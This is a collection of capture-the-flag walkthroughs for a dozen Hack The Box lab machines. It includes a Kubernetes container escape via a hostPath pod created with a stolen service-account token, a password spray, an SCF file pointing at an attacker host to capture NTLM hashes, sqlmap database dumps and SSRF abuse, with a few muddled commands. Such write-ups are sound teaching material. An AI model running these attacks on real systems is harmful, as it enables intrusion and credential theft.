12 posts tagged with "easy"

Task 1​

Which containerization framework are the services on TCP ports 2379 and 2380 components of?

Targeting those two specific ports with nmap -p 2379,2380 <target_ip> we see that the services running are the etcd-client and etcd-server accordingly. The etcd service is a key-value store used as Kubernetes' backing store for all cluster data.

Task 2​

How many pods are running on the target system?

One of Kubernetes components is the Kubelet API that is used by the control plane which manages nodes, the worker machines where pods run. Thus, we can use the Kubelet API to list all pods running on nodes. Kubelet API runs on port 10250 that we can validate its state by nmap -p 10250 -sS <target_ip>.

To find out the number of pods we can then run curl -k -X GET https://<target_ip>:10250/pods this will return a json response which we can then store in a json file and sort it to have a better overview of the information. Searching this file with for "hostIP" will return the matches for the IP's of the host of pods which essentially is the number of pods.

Task 3​

Which pod in the default namespace allows code execution? Choose from "etcd-steamcloud", "nginx", "kube-controller-manager-steamcloud", and "storage-provisioner".

We can eliminate the pod by searching on the json file stored previously for "namespace: "default"" for the 4 potential pods. The one that matches both conditions is the pod we are looking for.

Task 4​

In which directory is the service account access token and certificate stored inside a Kubernetes pod?

Looking under the volumeMounts field, we see the directory /var/run/secrets/kubernetes.io/serviceaccount/ mounted with the name kube-api-access-zwtvf. Searching for this name under volumes reveals a projected volume that contains two sources: a serviceAccountToken stored in token, and a configMap providing the CA certificate stored in ca.crt. These files are the pod’s service account token and certificate, used to authenticate and interact with the Kubernetes API server.

Task 5​

When creating a Kubernetes Pod, which Volume type can be used to mount a file or directory from the host's filesystem onto the Pod? Choose from "gcePersistentDisk", "hostPath", "secret", or "emptyDir"

From the same json file, in the pod’s volumeMounts, /root is mounted from a volume named flag. Looking up flag under volumes shows it is defined with "hostPath": { "path": "/opt/flag" }, meaning the volume type is hostPath, which mounts files/directories from the host filesystem into the Pod.

Task 6​

Submit the flag located in the user user's home directory.

We can use the tool kubeletctl to execute into the vulnerable pod by ./kubeletctl_<binary_for_os> --server <target_ip> --port 10250 exec -p nginx -n default -c nginx -- sh -lc that runs a shell inside the nginx container and in the nginx pod. In case you built from source, you need to be under the build directory and choose the correct binary file depending on your operating system. We can then navigate to the /root directory and get the user's flag.

Task 7​

Submit the flag located in root's home directory.

In order to answer this question, we need to escape from the containirised environment to the target machine. In the pod we are in and navigating to the directory /var/run/secrets/kubernetes.io/serviceaccount/ we can obtain both the token and the certificate. These credentials can be used to communicate directly with the Kubernetes API server. With the correct permissions, we can create a pod that mounts the host’s root filesystem (/) inside the container.

First, create the pod manifest such as:

cat > pod-hostfs.json <<'JSON'
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": { "name": "bb2-escape" },
  "spec": {
    "containers": [
      {
        "name": "bb",
        "image": "nginx:1.14.2",
        "imagePullPolicy": "Never",
        "command": ["sh","-lc","sleep 3600000"],
        "volumeMounts": [
          { "name": "host", "mountPath": "/node-host" }
        ]
      }
    ],
    "volumes": [
      { "name": "host", "hostPath": { "path": "/", "type": "Directory" } }
    ]
  }
}
JSON

This pod mounts the host's / directory at /node-host inside the container. Then, after storing the TOKEN and APISRV as environmental variables and the certificate in a file called "ca.crt", deploy the pod using the API server:

curl --cacert ca.crt -H "Authorization: Bearer $TOKEN" \
     -H "Content-Type: application/json" \
     -X POST "$APISRV/api/v1/namespaces/default/pods" \
     -d @pod-hostfs.json

After executing into the pod using the following command:

./kubeletctl_<binary_for_os> \
  --server <target_ip> --port 10250 \
  exec -p bb2-escape -n default -c bb -- sh -lc 'id && mount | head && ls -la /node-host'

the /node-host will be the host's root filesystem. Thus, to get the root flag, navigate to the node-host/root directory and grab it by running cat root.txt.

Task 1​

How many TCP ports are open?

Running nmap -sS <target_ip> we see two ports open on the target system.

Task 2​

What is the name of the JavaScript file loaded by the /invite page that has to do with invite codes?

Navigating to the target IP on the browser we see that the server is not found. After adding the target IP on the host file using the command sudo vim /etc/hosts with the domain name being 2million.htb we can refresh the page and navigate to the /invite page. There, we see a sign-up/login form.

Viewing the page source and searching for any Javascript file, we locate the following, having the name inviteapi.min.js:

Task 3​

What JavaScript function on the invite page returns the first hint about how to get an invite code? Don't include () in the answer.

Opening the previous file, we locate the function makeInviteCode that is the Javascript function returning the first hint.

Task 4​

The endpoint in makeInviteCode returns encrypted data. That message provides another endpoint to query. That endpoint returns a code value that is encoded with what very common binary to text encoding format. What is the name of that encoding?

First, opening the console on the developer tools, we call the function by makeInviteCode and observe the result:

We see that the data is encoded with ROT13, so we can decode the value of the field data using any ROT13 decoder and we get the message "In order to generate the invite code, make a POST request to /api/v1/invite/generate". So, we can use fetch in the browser console to query this endpoint by:

fetch('/api/v1/invite/generate', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' }
})
  .then(res => res.json())
  .then(data => console.log(data));

As a response, we see the code that is encoded using Base64.

Task 5​

What is the path to the endpoint the page uses when a user clicks on "Connection Pack"?

First, we decode the code from the previous task and use it to sign up and register for an account. We then login and look for the "Connection Pack". We find it under the "Access" page, we open the tools on the Network tab and clicking the button. On the Headers tab of the request we see the API endpoint where the GET function sends the request.

Task 6​

How many API endpoints are there under /api/v1/admin?

By navigating to the endpoint /api/v1 we can see a list of endpoints including admin.

Task 7​

What API endpoint can change a user account to an admin account?

Inspecting the result from the previous task we see that he desired endpoint is /api/v1/admin/settings/update.

Task 1​

What is the name of the non-default SMB share that is readable with guest access on Cicada?

Running smbclient -N -L //<target_ip> to connect to the share server without providing a password and list the shares we see two non-default shares named DEV and HR.

Next, to see which one is readable as a guest, we will try to connect to those specific shares. Running smbclient -N //<target_ip>/<share_name> we see the one we have access to read is the HR share.

Task 2​

What is the name of the file found in the HR share?

Seen in the previous task, from listing the contents of the HR share, the file name is "Notice from HR.txt".

Task 3​

Which user account is still using the company default password?

To see the contents of the file found, we can transfer it to the host by running get "Notice from HR.txt". Opening it, we see a welcoming message to a new hire with the default password but it does not give a username

Then, we can try to enumerate domain users on the target IP and save them to a file by running lookupsid.py anonymous@<target_ip> > lookupsid_output.txt. Then, we save the usernames cleanly we run grep '(SidTypeUser)' lookupsid_output.txt | awk -F '\\' '{print $2}' | cut -d' ' -f1 > users.txt. Finally using the password found in the file, we can perform a password spray attack by running netexec smb <target_ip> -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' and find the username to be michael.wrightson.

Task 4​

Which user has left their password in Active Directory metadata?

We dump the AD metadata using ldapdomaindump -u cicada.htb\\michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' <target_ip>. We then try the command grep -iE 'pass|key|desc|comment' domain_users.json to look for password in the file matching any lines that contain the mentioned keywords.

After finding the password we can try to connect with it using the users.txt file from the previous task as netexec smb <target_ip> -u users.txt -p 'aRt$Lp#7t*VQ!3'.

Task 1​

How many TCP ports are listening on BoardLight?

By running sudo nmap -sS <target_ip> we scan for all TCP ports on the target machine.

Task 2​

What is the domain name used by the box?

Navigating to the web page by typing the IP address on a browser, we see at the end of the page that the contact email is info@board.htb. At the end of the page, we also see the copyright message "2020 All Rights Reserved By Board.htb" using the same domain. Those are strong indications of the domain used by the box.

Task 3​

What is the name of the application running on a virtual host of board.htb?

For answering this task, we can use the gobuster tool to brute-force subdomains via virtual host fuzzing. After adding the target IP address - domain pair on the /etc/hosts file, we run gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt.

We find the crm.board.htb domain and we add this with the target IP address to the /etc/hosts file as well. After, we navigate to the domain name on the web browser and find the application.

Task 4​

What version of Dolibarr is running on BoardLight?

On the top of the web page, the version for the application shows to be 17.0.0.

Task 5​

What is the default password for the admin user on Dolibarr?

Since we are presented with a login page we can try the password admin for the user admin which works successfully getting as to the admin's page.

Task 6​

What is the 2023 CVE ID for an authenticated vulnerability that can lead to remote code execution in this version of Dolibarr?

Searching for the version of Dolibarr on the NIST vulnerability database, we find the ID to be CVE-2023-30253.

Task 1​

We're prompted for log on credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers?

We use curl with the option for fetching headers only curl -I <target_ip> and see on the WWW-Authenticate the username admin.

Task 2​

Weak passwords are all too common and this target is no exception. What is the password for this target's login?

Before using any automated tools, we try with the default, common password admin and it gets us in. On the main page we are presented with a MFP Firmware Update Center.

Task 3​

There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection?

The file that is asked here, has the extension .scf which stands for Shell Command File. This file can be placed on a writable SMB share or web-based file upload to force outbound authentication requests. For more detailed information visit MITRE ATT&CK

Task 4​

We've intercepted an Net-NTLMv2 hash with Responder. What is the mode in Hashcat required to crack this hash format?

When Responder intercepts a Net-NTLMv2 hash, the format looks like:

USERNAME::DOMAIN:ServerChallenge:NTProofStr:Blob

This structure corresponds exactly to the format supported by Hashcat mode 5600 which is backed up by the Hashcat official documentation Hashcat Generic hash types

Task 5​

What is the tony user's password?

To solve this task, we will start responder sudo responder -I tun0 and then upload a scf file to the file share via the printer upload form that would trigger an SMB authentication. We create a file as follows:

[Shell]
Command=2
IconFile=\\<host_ip>\share\icon.ico
[Taskbar]
Command=ToggleDesktop

This works, and the Net-NTLMv2 hash is captured by Responder because this upload is reviewed manually and thus opened as the web page explains.

As mentioned in the previous task, the full hash string can be cracked using Hashcat mode 5600. We create a file called tony_hash with this hash, we run hashcat -m 5600 -a 0 tony_hash.txt /usr/share/wordlists/rockyou.txt and the password is cracked.

Task 6​

Submit the flag located on the tony user's desktop.

We will first list the shared folders on the target Microsoft-DS by running smbclient -L //<target_ip> -U 'tony' using the user tony's password we found in the previous task.

Then we can try connecting directly to the C$ default share by running smbclient //<target_ip>/C$ -U 'tony' which gave us access denied. We then try crackmapexec smb <target_ip> -u tony -p 'liltony' --shares

This validates that the user does not have access but we see that Windows 10 Enterprise is used which by default has WinRM installed and often enabled.

crackmapexec winrm <target_ip> -u tony -p liltony

Since the service is enabled we can use evil-winrm -i <target_ip> -u tony -p liltony. We have access and navigating to tony's Desktop we get the flag by cat user.txt.

Task 1​

Submit user flag.

Opening the browser to the IP address of the target it is revealed that the web site uses DDoS protection.

Navigating to /robots.txt we can see that there is a path called writeup/.

The writeup/ path shows the following page:

Running whatweb against the website whatweb <target_ip>/writeup -v we find the CMS to be CMS Made Simple.

We can then try the directories used which can be found at http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk/.

Trying out the path admin/ we get a pop-up to authenticate, default credentials username=admin and password=admin did not get us in.

Next, other directories are being tried to find the version of the CMS. At doc/CHANGELOG.txt we found that the version is 2.2.9.1.

Using searchsploit CMS Made Simple we search for exploits and find versions lower than 2.2.10 are vulnerable to SQL Injection.

We can then copy the exploit from searchsploitby running searchsploit -m php/webapps/46635.py and run it by python3 46635.py -u http://<target_ip>/writeup/ -c -w rocktou.txt where the -c switch is specified to crack the detected password. The script detects the credentials which we can then use for the admin login prompt. This did not work but after trying ssh with the same credentials ssh <username>@<target_ip> we get in and find the user flag on the home directory of the user by cat user.txt.

Task 1​

How many TCP ports are open on the remote host?

nmap -sS <target_ip>

Task 2​

What is the domain for the Wordpress blog?

For answering this, we will attempt checking the information coming from the headers.

curl -I <target_ip>

We can se that the server is leaking information from the backend systems from the X-Backend-Server header that contains the hostname of the target IP.

Task 3​

Which 2019 CVE is the wordpress version vulnerable to?

First, we need to identify the version of wordpress. First, we add the domain to the host file by sudo vim /etc/hosts

Then, we use wpscan, the WordPress security scanner, to find the version and any vulnerabilities.

We found both the readme.html file location, which usually contains the wordpress version but the specific version was already identified. With a quick google search about the specific version we find the 2019 CVE.

Task 4​

What is the secret registration URL of the employee chat system?

We first need to enumerate the directories using gobuster dir.

gobuster dir -u http://office.paper/ -w <word_list>

Navigating to the index.php page we see some kind of chat system.

Going back to the CVE we previously found, this version could allow an unauthenticated user to view private or draft posts. Navigating to the page we also find this interesting post by the user Prinsonmike. Seems that we can use this wordpress vulnerability to access his draft hoping we can find this secret url.

We navigate http://office.paper/?static=1 and exploit the vulnerability and find the secret url.

Task 1​

How many open TCP ports are listening on Devvortex?

We can run a nmap to scan the ports on the target ip.

nmap -sS <target_ip>

Task 2​

What subdomain is configured on the target's web server?

Navigating to the ip address on the browser we get this nice screen.

This seems that the hostname cannot be resolved. Lets edit the /etc/hosts file to add the ip address to be resolved to the target domain.

sudo vim /etc/hosts

Then for finding the subdomain, we can use gobuster vhost since it is often that htb machine will use name-based virtual hosting, that is when multiple names run on a single ip address.

gobuster vhost -u https://devvortex.htb/ -w usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

We now found the subdomain dev.devvortex.htb.

Task 3​

What Content Management System (CMS) is running on dev.devvortex.htb?

We need to add the previous subdomain we found on the hosts file as well so again, we use the command sudo vim /etc/hosts.

For finding the CMS, we can use WhatWeb.

After navigating to usr/bin directory we can run whatweb -a 3 dev.devvortex.htb -v

From this search, we could not find the CMS. We can try to dig further on the website by doing a gobuster dir seach to explore further endpoints.

gobuster dir -u http://dev.devvortex.htb -w common.txt

From this search we found many endpoints with different status code that will be useful in the following task, one of them is the /administrator endpoint which is usually an interesting finding.

Navigating there we see a usual administrator login that reveals that the CMS used is Joomla.

We csn also find this looking in the /robots.txt endpoint which is a file that contains the redirections and other info.

Task 1​

Submit User Flag

We use nmap to find the services on the target machine and we see that an apache server runs on port 80.

nmap -sV target_ip

Navigating to the browser we see a login page where we will try bypassing the authentication using SQL injection.

Server-Side Template Injection (SSTI) vulnerability arises when an application incorporates user-supplied input directly into its server-side templates without proper sanitization or validation. Template engines, which combine templates with dynamic data to generate web pages, can be exploited through SSTI attacks.

To find forms that are candidates for sql injection run

sqlmap -u "http://10.129.51.14/" --forms --crawl=2 --dbms=mysql

--crawl=CRAWLDEPTH: crawls the website starting from the target url

We find a total of 8 targets. One of the identified forms is the login form and sqlmap auto-filled blank fields, tried multiple techniques and identified that the email field is vulnerable to time-based blind SQL injection.

After confirming the vulnerability we want to enumerate the database and find the table storing the usernames and passwords to get the user flag.

We can try running the following command to retrieve the databse names.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" --dbs

We found 2 available databases named information_schema and main.

Next, we will list the tables from each.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D <database_name> --tables

Starting with the database named main, we find 3 tables blog, blog_comments and user and which we can further investigate. We start with the table user.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D main -T user --columns

There, we find 4 columns in total with a column named email and a column name password that might get us the flags we need.

We then run the following command to retreive that information.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D main -T user -C email,password --dump

We find the email and the password and with those credentials we login after we use a hash cracker to find the plain texts password from the hashed one.

Now that we are logged in as admin, we can see a gear on the top right that redirects as to internal-administration.goodgames.htb. We need to edit the /etc/hosts file to point this domain to the target machine's IP. Note, editing the hosts file requires administrative privileges.

Task 1​

Which is the highest open TCP port on the target machine?

We can use nmap to scan ports in the target machine.

nmap -sS -p- <target_ip>

Task 2​

What is the name of the open source software that the application on 55555 is "powered by"?

To find information about the software, we can run nmap again with the additional field -sV.

nmap -sV -p <target_port> <target_ip>

From the result we see that the service is identified as uknown. Even so, we can infer from the fingerprint that is returned that the service is HTTP-based since it responds with HTTP headers. Part of the response is illustrated bellow:

We can then navigate to the ip address on the browser and at the bottom of the page we can find the open source software the application is powered by.

Task 3​

What is the version of request-baskets running on Sau?

From the previous task we also see the version of the open source software.

Task 4​

What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets?

By a quick search on cve.org we can find the CVE ID of this vulnerability. https://www.cve.org/CVERecord?id=CVE-2023-27163

Task 5​

What is the name of the software that the application running on port 80 is "powered by"?

From the previous task, we suspect that we can find the software from exploiting the SSRF vulnerability. Server-Side Request Forgery (SSRF) is a vulnerability where an attacker can manipulate a web application into sending unauthorized requests from the server. This vulnerability often occurs when an application makes HTTP requests to other servers based on user input which is exactly what we have in hand when we access the target ip in the browser.

Using the vulnerable application, we can exploit the SSRF vulnerability by creating a basket that forwards requests to http://localhost:80 gaining access to the web server that runs the application we are looking for.

We can do that by adding the endpoint. We got the token for the basket created.

Then we can configure the basket to forward requests to an internal service. We open the basket, and on the configuration settings we set the forward url to be our local host on port 80.

Then, if we navigate to the endpoint we made on the browser, it would redirect us to the service running on port 80.

There, on the bottom we see the name of the software.

Task1​

Which TCP port is open on the remote host?

Run nmap to scan for ports

nmap -sS -p- <target_ip>

After scanning, the port 8080 is revelead to be open, where the http-proxy service is running.

Task 2​

Which web server is running on the remote host? Looking for two words.

To find the web server, we need to add the version field on the nmap scan.

nmap -sV -p 8080 <target_ip>

We see on the version that the web server is Apache Tomcat.

Task 3​

Which relative path on the webserver leads to the Web Application Manager?

Open a browser and navigate to the ip address of the target. Remember to specify the port to be 8080.

Take a look at the page, to see you can find anything useful. Under Managing Tomcat you see a URL to manager webapp which might be what is refered as Web Application Manager. It is stated that for security, access is restricted and users are defined in $CATALINA_HOME/conf/tomcat-users.xml. This seems like an interesting information, but let's first see what the URL gets us. When clicking we get redirected to /manager/html where we are asked to input our credential. This is a point we should keep in mind, but for now we got the relative path the question is asking for.

Task 4​

What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username:password

On the previous step, we navigated to the /manager/html were we were asked for credentials. Since we were not able to authenticate, we show an example in the page of how to add a role to a user for accesssing the manager application. We can try to use those example credentials and see if they work on the login prompt, and they do!

Another approach to this, is using Metasploit Framework. First, run msfconsole and then search tomcat. There you will find the auxiliary auxiliary/scanner/http/tomcat_mgr_login which will attempt to login based on a list of username - password names. To use it, run use <number_of_option> and then to see what you it is required for you to set show options.

To select the target IP address and the port, run set RHOSTS <target_ip> and set RPORT <target_port>. Then type run and you will see that a login attempt was succesfull! As seen, those are the same credentials that were found before.

Task 1​

How many TCP ports are open?

nmap -sS -p- <ip_address>

• -sS: Stealth Scan, the fastest way to scan ports of the most popular protocol (TCP).

After scanning, 3 TCP ports are showing to be open.

Task 2​

After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

Upen the hamburger menu, and click on Security Snapshot (5 Second PCAP + Analysis)

This will redirect you ti a URL with something being data.

Task 3​

Are you able to get to other users' scans?

For this, you can try and change the id from 1 to another value. If you try with the value 0 you will see different dashboard, which means you were able to get to other user's scans.

Task 4​

What is the ID of the PCAP file that contains sensative data?

The page that was found before with the id equal to 0 is the one that contains sensative data.

Task 5​

Which application layer protocol in the pcap file can the sensetive data be found in?

When you download and open the file from the dashboard page with id = 0, inspect the packets from the Wireshark capture. You will soon find that the sensitive data is in the FTP protocol. Where a request is sent with a password in plain text.